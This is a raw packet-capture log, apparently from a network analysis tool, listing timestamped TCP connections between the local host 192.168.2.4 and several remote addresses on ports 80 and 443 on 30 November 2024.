Nov 30, 2024 04:06:29.650530100 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.651525021 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.651571035 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.651628017 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.651669025 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.652661085 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.652713060 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.652755976 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.652801037 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.653780937 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.653825998 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.653882027 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.653923988 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.654891014 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.654936075 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.655072927 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.655116081 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.656032085 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.656075001 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.656163931 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.656209946 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.657159090 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.657206059 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.657260895 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.657305956 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.658282995 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.658327103 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.658396959 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.658441067 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.659405947 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.659452915 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.659507990 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.659552097 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.660542965 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.660588026 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.660653114 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.660695076 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.661660910 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.661710024 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.661777973 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.661820889 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.662794113 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.662837029 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.662904024 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.662961006 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.663966894 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.664011955 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.664048910 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.664084911 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.665071964 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.665115118 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.665170908 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.665214062 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.666167021 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.666209936 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.666279078 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.666321039 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.667350054 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.667393923 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.667427063 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.667468071 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.668438911 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.668481112 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.668555975 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.668600082 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.669576883 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.669620991 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.669677019 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.669719934 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.670686007 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.670732975 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.670798063 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.670844078 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.671825886 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.671869993 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.671926022 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.671972036 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.673001051 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.673046112 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.673088074 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.673130989 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.674093962 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.674139023 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.674175978 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.674220085 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.675230026 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.675275087 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.675348043 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.675394058 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.676321983 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.676378012 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.676434994 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.676480055 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.677472115 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.677519083 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.677572966 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.677619934 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.678587914 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.678634882 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.678700924 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.678750992 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.679708958 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.679755926 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.679825068 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.679872036 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.680834055 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.680881023 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.680958986 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.681005001 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.681978941 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.682034969 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.682076931 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.682125092 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.683111906 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.683160067 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.683279991 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.683329105 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.684251070 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.684310913 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.684340954 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.684386969 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.685380936 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.685425997 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.685494900 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.685539961 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.686492920 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.686539888 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.686666965 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.686709881 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.687609911 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.687654018 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.687720060 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.687760115 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.688740015 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.688786983 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.688836098 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.688880920 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.689881086 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.689927101 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.689986944 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.690032005 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.690979004 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.691024065 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.833715916 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.833827019 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.833869934 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.833899975 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.834202051 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.834245920 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.834252119 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.834289074 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.835347891 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.835397005 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.835445881 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.835493088 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.836467981 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.836515903 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.836566925 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.836611032 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.837580919 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.837627888 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.837697029 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.837742090 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.838717937 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.838762999 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.838831902 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.838880062 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.839854956 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.839903116 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.839977026 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.840018988 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.840971947 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.841018915 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.841078997 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.841125011 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.842101097 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.842148066 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.842205048 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.842252016 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.843242884 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.843300104 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.843343019 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.843379021 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.844381094 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.844428062 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.844494104 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.844537973 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.845506907 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.845545053 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.845613003 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.845658064 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.846611023 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.846654892 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.846724033 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.846767902 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.847739935 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.847786903 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.847934961 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.847979069 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.848937988 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.848983049 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.849011898 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.849056005 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.849997044 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.850047112 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.850100994 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.850143909 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.851113081 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.851161957 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.851226091 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.851270914 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.852233887 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.852277994 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.852349043 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.852396011 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.853358030 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.853404999 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.853451967 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.853497982 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.854501009 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.854548931 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.854597092 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.854641914 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.855632067 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.855680943 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.855751991 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.855802059 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.856739044 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.856786966 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.856853008 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.856899023 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.857877016 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.857923985 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.857978106 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.858023882 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.859024048 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.859074116 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.859121084 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.859164000 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.860204935 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.860253096 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.860312939 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.860372066 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.861282110 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.861327887 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.861396074 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.861439943 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.862397909 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.862446070 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.862586021 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.862632036 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.863537073 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.863584042 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.863637924 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.863686085 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.864658117 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.864701033 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.864767075 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.864810944 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.865766048 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.865811110 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.865884066 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.865931034 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.866928101 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.866974115 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.867043972 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.867085934 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.868032932 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.868077993 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.868130922 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.868175030 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.869160891 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.869200945 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.869272947 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.869313002 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.870295048 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.870343924 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.870393038 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.870434046 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.871438026 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.871481895 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.871515989 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.871557951 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.872536898 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.872587919 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.872646093 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.872692108 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.873707056 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.873755932 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.873756886 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.873799086 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.874793053 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.874839067 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.874872923 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.874912024 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:30.894690037 CET	443	49810	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:30.894798040 CET	443	49810	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:30.894865990 CET	49810	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:30.896133900 CET	49810	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:30.896147966 CET	443	49810	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:31.051284075 CET	49815	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:31.051306963 CET	443	49815	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:31.051366091 CET	49815	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:31.052299976 CET	49815	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:31.052315950 CET	443	49815	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:31.178194046 CET	49816	80	192.168.2.4	185.215.113.206
Nov 30, 2024 04:06:31.298167944 CET	80	49816	185.215.113.206	192.168.2.4
Nov 30, 2024 04:06:31.298238993 CET	49816	80	192.168.2.4	185.215.113.206
Nov 30, 2024 04:06:31.305932045 CET	49816	80	192.168.2.4	185.215.113.206
Nov 30, 2024 04:06:31.425921917 CET	80	49816	185.215.113.206	192.168.2.4
Nov 30, 2024 04:06:32.098666906 CET	49798	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:32.098953009 CET	49818	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:32.218909025 CET	80	49818	185.215.113.43	192.168.2.4
Nov 30, 2024 04:06:32.218967915 CET	80	49798	185.215.113.43	192.168.2.4
Nov 30, 2024 04:06:32.218976021 CET	49818	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:32.219084978 CET	49798	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:32.219235897 CET	49818	80	192.168.2.4	185.215.113.43
Nov 30, 2024 04:06:32.319751978 CET	443	49815	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:32.319859028 CET	49815	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:32.321362972 CET	49815	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:32.321369886 CET	443	49815	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:32.321592093 CET	443	49815	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:32.323215961 CET	49815	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:32.323462963 CET	49815	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:32.323462963 CET	49815	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:32.323491096 CET	443	49815	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:32.339049101 CET	80	49818	185.215.113.43	192.168.2.4
Nov 30, 2024 04:06:32.753941059 CET	80	49816	185.215.113.206	192.168.2.4
Nov 30, 2024 04:06:32.754034996 CET	49816	80	192.168.2.4	185.215.113.206
Nov 30, 2024 04:06:32.756517887 CET	49816	80	192.168.2.4	185.215.113.206
Nov 30, 2024 04:06:32.878572941 CET	80	49816	185.215.113.206	192.168.2.4
Nov 30, 2024 04:06:33.224828959 CET	80	49816	185.215.113.206	192.168.2.4
Nov 30, 2024 04:06:33.224906921 CET	49816	80	192.168.2.4	185.215.113.206
Nov 30, 2024 04:06:33.520401955 CET	443	49815	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:33.520505905 CET	443	49815	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:33.520596981 CET	49815	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:33.520737886 CET	49815	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:33.520759106 CET	443	49815	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:33.598859072 CET	80	49818	185.215.113.43	192.168.2.4
Nov 30, 2024 04:06:33.598920107 CET	49818	80	192.168.2.4	185.215.113.43
